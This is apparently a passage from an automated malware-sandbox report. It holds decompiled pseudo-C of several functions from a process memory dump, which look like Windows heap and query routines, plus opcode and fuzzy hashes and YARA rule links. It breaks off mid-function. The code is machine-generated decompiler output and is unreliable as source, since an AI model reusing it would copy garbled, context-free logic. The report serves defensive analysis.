				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E03026D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0305B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x3107b9c; // 0x0
					_t74 = L03034620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E03059650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L030377F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0305F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E030513C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L030377F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E03059650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x0301c608
0x0301c615
0x0301c625
0x0301c62d
0x0301c635
0x0301c640
0x0301c680
0x0301c687
0x0301c688
0x0301c689
0x0301c694
0x0301c694
0x0301c642
0x0301c64a
0x0301c697
0x03087a25
0x03087a2b
0x03087a2e
0x03087a30
0x03087bea
0x03087bea
0x00000000
0x03087bea
0x03087a36
0x03087a43
0x03087a48
0x03087a4c
0x03087a4e
0x00000000
0x00000000
0x03087a58
0x03087a5a
0x03087a5b
0x03087a5c
0x03087a5d
0x03087a63
0x03087a64
0x03087a6a
0x03087a6c
0x03087a6e
0x030879cb
0x030879cb
0x030879ce
0x030879d0
0x03087a98
0x03087a9b
0x03087a9b
0x03087a9e
0x03087aa1
0x03087bbe
0x03087bbe
0x03087bc0
0x03087be0
0x03087be0
0x03087a01
0x03087a01
0x03087a05
0x03087a07
0x03087a15
0x03087a15
0x03087a1a
0x00000000
0x03087a1a
0x03087bc2
0x03087bc6
0x03087bc9
0x03087bcd
0x03087bcf
0x030879e6
0x030879e6
0x030879eb
0x030879eb
0x030879ef
0x030879f1
0x00000000
0x00000000
0x030879f3
0x030879f5
0x030879ff
0x030879ff
0x00000000
0x030879ff
0x030879f7
0x030879fd
0x00000000
0x00000000
0x00000000
0x030879fd
0x03087bd5
0x03087bd8
0x00000000
0x00000000
0x03087ba9
0x03087bac
0x03087bb0
0x03087bb1
0x03087bb1
0x03087bb6
0x00000000
0x03087bb6
0x03087aa7
0x03087aaa
0x00000000
0x00000000
0x03087ab2
0x03087ab3
0x03087ab5
0x03087aec
0x03087aef
0x03087b25
0x03087b28
0x03087b62
0x03087b64
0x03087b8f
0x03087b92
0x03087b96
0x03087b98
0x00000000
0x00000000
0x03087b9e
0x03087b9f
0x03087ba3
0x00000000
0x03087ba3
0x03087b66
0x03087b68
0x03087ae2
0x03087ae2
0x00000000
0x03087ae2
0x03087b6e
0x03087b72
0x03087b75
0x03087b81
0x03087b85
0x03087b87
0x00000000
0x00000000
0x03087b31
0x03087b34
0x03087b3c
0x03087b45
0x03087b46
0x03087b4f
0x03087b51
0x03087b57
0x03087b59
0x03087b59
0x00000000
0x03087b59
0x03087b77
0x00000000
0x03087b77
0x03087b2a
0x00000000
0x03087b2a
0x03087af1
0x03087af3
0x00000000
0x00000000
0x03087afb
0x03087afc
0x03087afe
0x00000000
0x00000000
0x03087b00
0x03087b03
0x00000000
0x00000000
0x03087b05
0x03087b09
0x03087b0d
0x03087b0f
0x00000000
0x00000000
0x03087b18
0x03087b1d
0x00000000
0x03087b1d
0x03087ab7
0x03087ab9
0x00000000
0x00000000
0x03087abf
0x03087ac1
0x00000000
0x00000000
0x03087ac3
0x03087ac6
0x00000000
0x00000000
0x03087ac8
0x03087acc
0x03087ad0
0x03087ad2
0x00000000
0x00000000
0x03087adb
0x00000000
0x03087adb
0x030879d6
0x030879d9
0x030879dc
0x03087a91
0x03087a94
0x00000000
0x03087a94
0x030879e2
0x00000000
0x030879e2
0x03087a74
0x03087a7a
0x00000000
0x00000000
0x03087a8a
0x03087a21
0x03087a21
0x00000000
0x03087a21
0x0301c650
0x0301c651
0x0301c656
0x0301c65c
0x0301c65d
0x0301c663
0x0301c664
0x0301c66a
0x0301c66e
0x030879c5
0x030879c7
0x00000000
0x030879c7
0x0301c67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83124f017204e3f8344ca2fb4a2eb051f133d4e1519939a3fb1f3131e89dfc80
Instruction ID: 019a3b29b1204af7f29c3522dc37e1fbf0eaa679df513fa7c3341ac27362fe5d
Opcode Fuzzy Hash: 83124f017204e3f8344ca2fb4a2eb051f133d4e1519939a3fb1f3131e89dfc80
Instruction Fuzzy Hash: 0981A5766463018BDB55EF14C880BAFB3E9EB84A54F284859EDC59B248D331ED41C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 030D03DA, Relevance: .2, Instructions: 218
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E030D03DA(signed int* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				signed char _v28;
				signed int _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				intOrPtr* _t80;
				signed int _t87;
				signed char _t90;
				signed int _t107;
				intOrPtr* _t119;
				signed int _t120;
				signed int _t121;
				signed char _t127;
				void* _t129;
				intOrPtr* _t130;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t144;
				signed char _t148;
				signed int _t154;
				signed char _t155;
				signed int _t164;
				unsigned int _t167;
				signed int _t168;
				signed int _t170;
				unsigned int _t173;
				signed int* _t174;
				signed int _t175;
				intOrPtr* _t177;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				signed char _t183;
				intOrPtr _t184;
				unsigned int _t186;
				unsigned int _t187;

				_push( *0x310634c);
				_t119 = __ecx;
				_t184 = __edx;
				_push( *0x3106348);
				_v20 = __ecx;
				_push(0);
				_t129 = 0xc;
				_t80 = E030DBBBB(_t129, _t129);
				_t130 = _t80;
				_v16 = _t130;
				if(_t130 == 0) {
					return _t80;
				}
				 *((intOrPtr*)(_t130 + 8)) = _a4;
				_t82 =  &(__ecx[1]);
				 *((intOrPtr*)(_t130 + 4)) = _t184;
				_v36 =  &(__ecx[1]);
				E03032280( &(__ecx[1]), _t82);
				_v12 = 1;
				 *_t119 =  *((intOrPtr*)( *[fs:0x18] + 0x24));
				_t120 = _t119 + 8;
				_t175 =  *(_t120 + 4);
				_t87 = _t175 >> 5;
				if( *_t120 < _t87 + _t87) {
					L22:
					_t186 = _t175 >> 5;
					_t177 = _v16;
					_t90 = (_t87 | 0xffffffff) << (_t175 & 0x0000001f) &  *(_t177 + 4);
					_v8 = _t90;
					_t137 =  *(_t120 + 8);
					_v8 = (_v8 >> 0x18) + ((_v8 >> 0x00000010 & 0x000000ff) + ((_t90 >> 0x00000008 & 0x000000ff) + ((_t90 & 0x000000ff) + 0xb15dcb) * 0x25) * 0x25) * 0x25;
					_t67 = _t186 - 1; // 0xffffffdf
					_t164 = _t67 & _v8;
					 *_t177 =  *((intOrPtr*)(_t137 + _t164 * 4));
					 *((intOrPtr*)(_t137 + _t164 * 4)) = _t177;
					 *_t120 =  *_t120 + 1;
					_t178 = 0;
					L23:
					 *_v20 =  *_v20 & 0x00000000;
					E0302FFB0(_t120, _t178, _v36);
					if(_t178 != 0) {
						E030DBCD2(_t178,  *0x3106348,  *0x310634c);
					}
					return _v12;
				}
				_t139 = 2;
				_t87 = E0304F3D5( &_v8, _t87 * _t139, _t87 * _t139 >> 0x20);
				if(_t87 < 0) {
					goto L22;
				}
				_t187 = _v8;
				if(_t187 < 4) {
					_t187 = 4;
				}
				_push(0);
				_t87 = E030D0150(_t187 << 2);
				_t179 = _t87;
				_v8 = _t179;
				if(_t179 == 0) {
					_t175 =  *(_t120 + 4);
					if(_t175 >= 0x20) {
						goto L22;
					}
					_v12 = _v12 & 0x00000000;
					_t178 = _v16;
					goto L23;
				} else {
					_t19 = _t187 - 1; // 0x3
					_t141 = _t19;
					if((_t187 & _t141) == 0) {
						L10:
						if(_t187 > 0x4000000) {
							_t187 = 0x4000000;
						}
						_v28 = _v28 & 0x00000000;
						_t167 = _t187 << 2;
						_t107 = _t120 | 0x00000001;
						_v24 = _t179;
						_t168 = _t167 >> 2;
						asm("sbb ecx, ecx");
						_t144 =  !(_t167 + _t179) & _t168;
						if(_t144 <= 0) {
							L15:
							_t180 = 0;
							_t170 = (_t168 | 0xffffffff) << ( *(_t120 + 4) & 0x0000001f);
							_v24 = _t170;
							if(( *(_t120 + 4) & 0xffffffe0) <= 0) {
								L20:
								_t147 =  *(_t120 + 8);
								_t87 = _v8;
								_t175 =  *(_t120 + 4) & 0x0000001f | _t187 << 0x00000005;
								 *(_t120 + 8) = _t87;
								 *(_t120 + 4) = _t175;
								if( *(_t120 + 8) != 0) {
									_push(0);
									_t87 = E030D0180(_t147);
									_t175 =  *(_t120 + 4);
								}
								goto L22;
							} else {
								goto L16;
							}
							do {
								L16:
								_t121 =  *(_t120 + 8);
								_v32 = _t121;
								while(1) {
									_t148 =  *(_t121 + _t180 * 4);
									_v28 = _t148;
									if((_t148 & 0x00000001) != 0) {
										goto L19;
									}
									 *(_t121 + _t180 * 4) =  *_t148;
									_t124 =  *(_t148 + 4) & _t170;
									_t173 = _v8;
									_t154 = _t187 - 0x00000001 & (( *(_t148 + 4) & _t170) >> 0x00000018) + ((( *(_t148 + 4) & _t170) >> 0x00000010 & 0x000000ff) + ((_t124 >> 0x00000008 & 0x000000ff) + ((_t124 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
									_t127 = _v28;
									 *_t127 =  *(_t173 + _t154 * 4);
									 *(_t173 + _t154 * 4) = _t127;
									_t170 = _v24;
									_t121 = _v32;
								}
								L19:
								_t180 = _t180 + 1;
								_t120 =  &(_v20[2]);
							} while (_t180 <  *(_t120 + 4) >> 5);
							goto L20;
						} else {
							_t174 = _t179;
							_t183 = _v28;
							do {
								_t183 = _t183 + 1;
								 *_t174 = _t107;
								_t174 =  &(_t174[1]);
							} while (_t183 < _t144);
							goto L15;
						}
					}
					_t155 = _t141 | 0xffffffff;
					if(_t187 == 0) {
						L9:
						_t187 = 1 << _t155;
						goto L10;
					} else {
						goto L8;
					}
					do {
						L8:
						_t155 = _t155 + 1;
						_t187 = _t187 >> 1;
					} while (_t187 != 0);
					goto L9;
				}
			}

0x030d03e5
0x030d03eb
0x030d03ed
0x030d03ef
0x030d03f5
0x030d03f8
0x030d03fc
0x030d03ff
0x030d0404
0x030d0406
0x030d040b
0x030d0619
0x030d0619
0x030d0414
0x030d0417
0x030d041b
0x030d041e
0x030d0421
0x030d042c
0x030d0436
0x030d0438
0x030d043b
0x030d0440
0x030d0448
0x030d058e
0x030d0596
0x030d059b
0x030d05a0
0x030d05a3
0x030d05d1
0x030d05d6
0x030d05d9
0x030d05dc
0x030d05e2
0x030d05e4
0x030d05e7
0x030d05e9
0x030d05eb
0x030d05f1
0x030d05f4
0x030d05fb
0x030d060b
0x030d060b
0x00000000
0x030d0610
0x030d0450
0x030d0458
0x030d045f
0x00000000
0x00000000
0x030d0465
0x030d046b
0x030d046f
0x030d046f
0x030d0472
0x030d0478
0x030d047d
0x030d047f
0x030d0484
0x030d061c
0x030d0622
0x00000000
0x00000000
0x030d0628
0x030d062c
0x00000000
0x030d048a
0x030d048a
0x030d048a
0x030d048f
0x030d04a2
0x030d04a9
0x030d04ab
0x030d04ab
0x030d04ad
0x030d04b3
0x030d04b8
0x030d04bb
0x030d04c1
0x030d04c6
0x030d04ca
0x030d04cc
0x030d04dd
0x030d04e6
0x030d04e8
0x030d04f1
0x030d04f4
0x030d0568
0x030d056b
0x030d0571
0x030d0577
0x030d0579
0x030d057c
0x030d0581
0x030d0583
0x030d0586
0x030d058b
0x030d058b
0x00000000
0x00000000
0x00000000
0x00000000
0x030d04f6
0x030d04f6
0x030d04f6
0x030d04f9
0x030d04fc
0x030d04fc
0x030d04ff
0x030d0505
0x00000000
0x00000000
0x030d0509
0x030d050f
0x030d0532
0x030d0542
0x030d0544
0x030d054a
0x030d054c
0x030d054f
0x030d0552
0x030d0552
0x030d0557
0x030d055a
0x030d055b
0x030d0564
0x00000000
0x030d04ce
0x030d04ce
0x030d04d0
0x030d04d3
0x030d04d3
0x030d04d4
0x030d04d6
0x030d04d9
0x00000000
0x030d04d3
0x030d04cc
0x030d0491
0x030d0496
0x030d049d
0x030d04a0
0x00000000
0x00000000
0x00000000
0x00000000
0x030d0498
0x030d0498
0x030d0498
0x030d0499
0x030d0499
0x00000000
0x030d0498

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94eae5259ae8091522f6771e2541ac77e17ce471f0df0e008013f7fde6f9d71a
Instruction ID: b45873e420d6527816243b2d78fcca6d1b0641d582b831553fa41ab39edb9ae6
Opcode Fuzzy Hash: 94eae5259ae8091522f6771e2541ac77e17ce471f0df0e008013f7fde6f9d71a
Instruction Fuzzy Hash: 737196B6A013159BDB18CF58C990BADFBF6EF88310F198169D8199F385D731E941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 030DD616, Relevance: .2, Instructions: 216
COMMONCrypto

Download Yara Rule

C-Code - Quality: 60%

			E030DD616(signed int __ecx, intOrPtr __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t79;
				signed char _t86;
				signed int _t88;
				void* _t91;
				signed int _t94;
				signed int _t95;
				unsigned int _t96;
				signed int _t110;
				signed char _t118;
				intOrPtr _t120;
				signed int _t123;
				signed int _t124;
				signed char _t131;
				signed int _t133;
				signed int _t137;
				signed char _t147;
				signed int _t153;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t164;
				signed int _t169;
				signed int _t173;

				_v8 =  *0x310d360 ^ _t173;
				_t120 = __edx;
				_t159 = __ecx;
				_v40 = __edx;
				_t150 =  *(__edx + 1) & 0x000000ff;
				_t174 =  *0x310610c & 0x00000001;
				_t160 = 0;
				_v24 = 0;
				_v28 =  *(0x2ffaef0 + ( *(__edx + 1) & 0x000000ff) * 2) & 0x0000ffff;
				if(( *0x310610c & 0x00000001) == 0) {
					_v12 = 0;
				} else {
					_v12 = E030DC70A(__ecx + 0x38, _t150);
				}
				_t79 = E030DC5FF(_t120, 0, _t174);
				_t153 = _t79 * _v28;
				_v36 = _t153;
				_v32 = (0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + ((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + 0xfff + _t153 >> 0xc) * 2;
				_t86 = E030DA359((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + ((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + 0xfff + _t153 >> 0xc) * 2 + _t153,  *((intOrPtr*)(_t159 + 0x2c)));
				_t131 = _t86;
				_v16 = _t86;
				if(_t131 <= 0xc) {
					_t131 = 0xc;
					_v16 = _t131;
				}
				_t123 = 1 << _t131;
				_v20 = 1;
				if(( *0x310610c & 0x00000008) == 0) {
					L11:
					_t88 = 1;
					__eflags = 1;
					L12:
					_t133 = _a4 & _t88;
					_v32 = _t133;
					if(_t133 == 0) {
						L0303FAD0(_t159 + 0x34);
					}
					_t134 = _t159 + (_v16 + 0xfffffffc) * 8;
					_t91 = 0;
					if( *((intOrPtr*)(_t159 + (_v16 + 0xfffffffc) * 8 + 4)) == 0) {
						_t124 = 0;
					} else {
						_t124 = E03041710(_t134);
						_t91 = 0;
					}
					if(_t124 != 0) {
						_t94 = 1 <<  *(_t124 + 0x1c);
						__eflags = 1;
						goto L22;
					} else {
						 *0x310b1e0( *_t159, _v20, _t91, _a4);
						_t124 =  *( *(_t159 + 4) ^  *0x3106110 ^ _t159)();
						if(_t124 != 0) {
							_t94 = 0;
							_t160 = 0;
							L22:
							__eflags =  *0x310610c & 0x00000002;
							_v16 = _t94;
							if(( *0x310610c & 0x00000002) == 0) {
								L25:
								_t95 = E030DD597(_v20, _v28);
								_t156 = _t95;
								_v12 = _t95;
								L26:
								_t96 = _v16;
								__eflags = _t96;
								if(_t96 != 0) {
									__eflags =  *((char*)(_t124 + 0x1d)) - 1;
									if( *((char*)(_t124 + 0x1d)) > 1) {
										_t169 = _t96 >> 0xc;
										__eflags = _t169;
										_t160 =  ~_t169;
										_v24 = _t160;
									}
								}
								__eflags = _t96 - _t156;
								if(_t96 >= _t156) {
									L33:
									_t137 = _v20;
									__eflags = _t156 - _t137;
									if(_t156 != _t137) {
										_t160 = _t160 + (_t156 >> 0xc);
										__eflags = _t160;
									}
									__eflags = _t160;
									if(_t160 != 0) {
										asm("lock xadd [eax], esi");
									}
									_push(_t137);
									_t156 = _t137;
									E030DDEF6(_t124, _t137, _t137, _v28);
									asm("lock inc dword [eax+0x20]");
									asm("lock xadd [eax], ecx");
									_t161 = _t124;
									_t124 = 0;
									__eflags = 0;
									goto L38;
								} else {
									 *0x310b1e0( *_t159, _t124, _t156);
									_t110 =  *( *(_t159 + 0xc) ^  *0x3106110 ^ _t159)();
									__eflags = _t110;
									if(_t110 >= 0) {
										_t160 = _v24;
										_t156 = _v12;
										goto L33;
									}
									_t161 = 0;
									L38:
									_v12 = _t161;
									__eflags = _t124;
									if(_t124 != 0) {
										_t164 =  *(_t159 + 8) ^  *0x3106110 ^ _t159;
										__eflags = _t164;
										 *0x310b1e0( *_t159, _t124, _v20, _a4);
										 *_t164();
										_t161 = _v12;
									}
									L40:
									if(_v32 == 0) {
										E0303FA00(_t124, _t159 + 0x34, _t159, _t159 + 0x34);
									}
									return E0305B640(_t161, _t124, _v8 ^ _t173, _t156, _t159, _t161);
								}
							}
							__eflags = _v12;
							if(_v12 == 0) {
								goto L25;
							}
							_t156 = _v20;
							_v12 = _t156;
							goto L26;
						}
						_t161 = 0;
						goto L40;
					}
				}
				_t146 = _v36;
				if(_v32 > _v36 >> 6) {
					goto L11;
				}
				_t118 = E030DA359(_t146,  *((intOrPtr*)(_t159 + 0x2c)));
				_t147 = _t118;
				_v16 = _t118;
				if(_t147 <= 0xc) {
					_t147 = 0xc;
					_v16 = _t147;
				}
				_t88 = 1;
				_t156 = 1 << _t147;
				if(_t123 > 1) {
					_v20 = 1;
				}
				goto L12;
			}

0x030dd625
0x030dd629
0x030dd62d
0x030dd62f
0x030dd632
0x030dd638
0x030dd63f
0x030dd641
0x030dd64c
0x030dd64f
0x030dd660
0x030dd651
0x030dd659
0x030dd659
0x030dd667
0x030dd66e
0x030dd67c
0x030dd69a
0x030dd6a0
0x030dd6a5
0x030dd6a7
0x030dd6ad
0x030dd6b1
0x030dd6b2
0x030dd6b2
0x030dd6b8
0x030dd6c1
0x030dd6c4
0x030dd6fb
0x030dd6fd
0x030dd6fd
0x030dd6fe
0x030dd701
0x030dd703
0x030dd706
0x030dd70c
0x030dd70c
0x030dd717
0x030dd71a
0x030dd720
0x030dd72d
0x030dd722
0x030dd727
0x030dd729
0x030dd729
0x030dd731
0x030dd76a
0x030dd76a
0x00000000
0x030dd733
0x030dd749
0x030dd751
0x030dd755
0x030dd75e
0x030dd760
0x030dd76c
0x030dd76c
0x030dd773
0x030dd776
0x030dd786
0x030dd78c
0x030dd791
0x030dd793
0x030dd796
0x030dd796
0x030dd799
0x030dd79b
0x030dd79d
0x030dd7a1
0x030dd7a5
0x030dd7a5
0x030dd7a8
0x030dd7aa
0x030dd7aa
0x030dd7a1
0x030dd7ad
0x030dd7af
0x030dd7d8
0x030dd7d8
0x030dd7db
0x030dd7dd
0x030dd7e4
0x030dd7e4
0x030dd7e4
0x030dd7e6
0x030dd7e8
0x030dd7f0
0x030dd7f0
0x030dd7f4
0x030dd7f9
0x030dd7fd
0x030dd805
0x030dd810
0x030dd814
0x030dd816
0x030dd816
0x00000000
0x030dd7b1
0x030dd7c2
0x030dd7c8
0x030dd7ca
0x030dd7cc
0x030dd7d2
0x030dd7d5
0x00000000
0x030dd7d5
0x030dd7ce
0x030dd818
0x030dd818
0x030dd81b
0x030dd81d
0x030dd831
0x030dd831
0x030dd835
0x030dd83b
0x030dd83d
0x030dd83d
0x030dd840
0x030dd844
0x030dd84a
0x030dd84a
0x030dd861
0x030dd861
0x030dd7af
0x030dd778
0x030dd77c
0x00000000
0x00000000
0x030dd77e
0x030dd781
0x00000000
0x030dd781
0x030dd757
0x00000000
0x030dd757
0x030dd731
0x030dd6c6
0x030dd6d1
0x00000000
0x00000000
0x030dd6d6
0x030dd6db
0x030dd6dd
0x030dd6e3
0x030dd6e7
0x030dd6e8
0x030dd6e8
0x030dd6ed
0x030dd6f0
0x030dd6f4
0x030dd6f6
0x030dd6f6
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a666e6bde1931d79778626f5588b7583e9065f973f8bac1f3718f74200306b7
Instruction ID: dbcda6221cf959856549953b840298e3a7628689491e2e014ad3441da4765092
Opcode Fuzzy Hash: 6a666e6bde1931d79778626f5588b7583e9065f973f8bac1f3718f74200306b7
Instruction Fuzzy Hash: A2818375E0131A9BCB54DFA8D8806AEBBF5FF8C304F1985A9D415EB240EB709951CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 030CFA2B, Relevance: .2, Instructions: 214
COMMONCrypto

Download Yara Rule

C-Code - Quality: 25%

			E030CFA2B(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t98;
				signed char _t106;
				intOrPtr _t107;
				signed char _t114;
				signed short _t116;
				signed short _t117;
				signed short _t121;
				signed short _t123;
				signed int* _t127;
				signed int _t128;
				signed int _t130;
				signed short _t134;
				void* _t135;
				signed int* _t136;
				void* _t138;
				signed int _t148;
				signed int _t154;
				signed int _t156;
				signed int _t157;
				intOrPtr _t163;
				intOrPtr _t168;
				void* _t169;
				intOrPtr _t171;

				_t157 = __edx;
				_push(0x2c);
				_push(0x30f0e38);
				_t98 = E0306D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t169 - 0x34)) = __edx;
				_t168 = __ecx;
				 *((intOrPtr*)(_t169 - 0x38)) = __ecx;
				 *((intOrPtr*)(_t169 - 0x20)) = 0;
				 *((intOrPtr*)(_t169 - 0x1c)) = 0;
				_t171 =  *0x3107bc8; // 0x0
				if(_t171 == 0) {
					 *((intOrPtr*)(_t169 - 4)) = 0;
					_t148 =  *__edx;
					 *(_t169 - 0x2c) = _t148 & 0x0000ffff;
					 *(_t169 - 0x28) = _t148 >> 0x18;
					 *(_t169 - 0x24) = _t148 >> 8;
					_t106 = _t148 >> 0x10;
					if(( *(__ecx + 0x4c) & _t148) == 0) {
						 *((intOrPtr*)(_t169 - 0x1c)) = 0xa;
						if(( *(__ecx + 0x40) & 0x04000000) != 0 ||  *(_t169 - 0x28) == (_t106 ^ _t148 ^  *(_t169 - 0x24))) {
							_t148 =  *(_t169 - 0x2c) & 0x0000ffff;
							 *((intOrPtr*)(_t169 - 0x1c)) = 1;
							_t114 =  *((intOrPtr*)(_t157 + 6));
							if(_t114 == 0) {
								_t163 = _t168;
							} else {
								_t163 = (1 - (_t114 & 0x000000ff) << 0x10) + (_t157 & 0xffff0000);
							}
							 *((intOrPtr*)(_t169 - 0x20)) = _t163;
							_t116 = _t148 & 0x0000ffff;
							if( *((intOrPtr*)(_t163 + 8)) == 0xffeeffee) {
								_t148 =  *((intOrPtr*)(_t157 + 7));
								if(_t148 == 4) {
									L12:
									_t117 = _t116 & 0x0000ffff;
									 *(_t169 - 0x2c) = _t117;
									 *((intOrPtr*)(_t169 - 0x1c)) = 3;
									if(_t148 != 3) {
										 *((intOrPtr*)(_t169 - 0x1c)) = 6;
										_t148 =  *(_t168 + 0x54) & 0x0000ffff;
										 *(_t169 - 0x24) = _t148;
										_push(0);
										_pop(0);
										if(( *(_t157 + 4 + (_t117 & 0x0000ffff) * 8) ^ _t148) ==  *(_t169 - 0x2c)) {
											_t121 = _t148;
											goto L23;
										}
									} else {
										_t30 = _t157 + 8; // 0x8
										_t148 = _t30;
										_t130 =  *(_t148 + 0x10);
										if((_t130 & 0x00000fff) == 0 && _t130 >=  *((intOrPtr*)(_t163 + 0x1c)) &&  *((intOrPtr*)(_t148 + 0x14)) +  *(_t148 + 0x10) <=  *((intOrPtr*)(_t163 + 0x28))) {
											 *((intOrPtr*)(_t169 - 0x1c)) = 4;
											_t148 =  *_t148;
